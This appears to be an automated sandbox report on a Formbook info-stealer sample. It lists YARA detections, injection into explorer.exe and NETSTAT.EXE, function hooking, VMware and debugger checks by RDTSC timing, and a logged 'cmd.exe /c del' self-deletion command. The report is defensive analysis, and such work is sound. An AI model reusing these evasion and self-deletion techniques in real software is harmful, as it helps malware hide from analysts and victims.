          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile created: C:\Users\user\AppData\Local\Temp\nskA2DC.tmpJump to behavior
          Source: Y4U48592345670954.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Y4U48592345670954.exeVirustotal: Detection: 17%
          Source: Y4U48592345670954.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile read: C:\Users\user\Desktop\Y4U48592345670954.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeUnpacked PE file: 2.2.Y4U48592345670954.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_004048E9 push ebp; retf 2_2_004048EA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00417138 push ecx; iretd 2_2_00417150
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040993B pushad ; retf 2_2_0040993C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_004169DF push eax; iretd 2_2_004169E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BCD0D1 push ecx; ret 2_2_00BCD0E4
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_004048E9 push ebp; retf 2_1_004048EA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00417138 push ecx; iretd 2_1_00417150
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_0040993B pushad ; retf 2_1_0040993C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_004169DF push eax; iretd 2_1_004169E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038BD0D1 push ecx; ret 4_2_038BD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D548E9 push ebp; retf 4_2_00D548EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D669DF push eax; iretd 4_2_00D669E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D5993B pushad ; retf 4_2_00D5993C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D67138 push ecx; iretd 4_2_00D67150
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CEB5 push eax; ret 4_2_00D6CF08
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF6C push eax; ret 4_2_00D6CF72
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF02 push eax; ret 4_2_00D6CF08
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF0B push eax; ret 4_2_00D6CF72
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile created: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000D598E4 second address: 0000000000D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000D59B5E second address: 0000000000D59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6616Thread sleep count: 39 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6616Thread sleep time: -78000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4164Thread sleep time: -75000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.925108895.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000003.00000000.672858468.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.676634834.000000000FD24000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040ACD0 LdrLoadDll,2_2_0040ACD0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_6F731000
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_02841699 mov eax, dword ptr fs:[00000030h]0_2_02841699
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_028418B1 mov eax, dword ptr fs:[00000030h]0_2_028418B1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov ecx, dword ptr fs:[00000030h]2_2_00BAF0BF
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h]2_2_00BAF0BF
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h]2_2_00BAF0BF
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C0B8D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB90AF mov eax, dword ptr fs:[00000030h]2_2_00BB90AF
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79080 mov eax, dword ptr fs:[00000030h]2_2_00B79080
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h]2_2_00BF3884
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h]2_2_00BF3884
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B758EC mov eax, dword ptr fs:[00000030h]2_2_00B758EC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]2_2_00B8B02A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]2_2_00B8B02A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]2_2_00B8B02A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]2_2_00B8B02A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]2_2_00BA002D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]2_2_00BA002D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]2_2_00BA002D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]2_2_00BA002D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]2_2_00BA002D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]2_2_00BF7016
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]2_2_00BF7016
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]2_2_00BF7016
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C32073 mov eax, dword ptr fs:[00000030h]2_2_00C32073
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41074 mov eax, dword ptr fs:[00000030h]2_2_00C41074
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h]2_2_00C44015
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h]2_2_00C44015
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h]2_2_00B90050
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h]2_2_00B90050
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]2_2_00BF51BE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]2_2_00BF51BE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]2_2_00BF51BE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]2_2_00BF51BE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF69A6 mov eax, dword ptr fs:[00000030h]2_2_00BF69A6
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h]2_2_00BA61A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h]2_2_00BA61A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C041E8 mov eax, dword ptr fs:[00000030h]2_2_00C041E8
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2990 mov eax, dword ptr fs:[00000030h]2_2_00BA2990
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C182 mov eax, dword ptr fs:[00000030h]2_2_00B9C182
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA185 mov eax, dword ptr fs:[00000030h]2_2_00BAA185
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]2_2_00B7B1E1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]2_2_00B7B1E1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]2_2_00B7B1E1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h]2_2_00BA513A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h]2_2_00BA513A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov ecx, dword ptr fs:[00000030h]2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]2_2_00B79100
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]2_2_00B79100
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]2_2_00B79100
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h]2_2_00B7B171
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h]2_2_00B7B171
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C962 mov eax, dword ptr fs:[00000030h]2_2_00B7C962
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h]2_2_00B9B944
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h]2_2_00B9B944
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]2_2_00B8AAB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]2_2_00B8AAB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFAB0 mov eax, dword ptr fs:[00000030h]2_2_00BAFAB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]2_2_00B752A5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]2_2_00B752A5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]2_2_00B752A5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]2_2_00B752A5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]2_2_00B752A5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h]2_2_00BAD294
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h]2_2_00BAD294
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2AE4 mov eax, dword ptr fs:[00000030h]2_2_00BA2AE4
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2ACB mov eax, dword ptr fs:[00000030h]2_2_00BA2ACB
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3EA55 mov eax, dword ptr fs:[00000030h]2_2_00C3EA55
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C04257 mov eax, dword ptr fs:[00000030h]2_2_00C04257
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h]2_2_00BB4A2C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h]2_2_00BB4A2C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h]2_2_00B7AA16
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h]2_2_00B7AA16
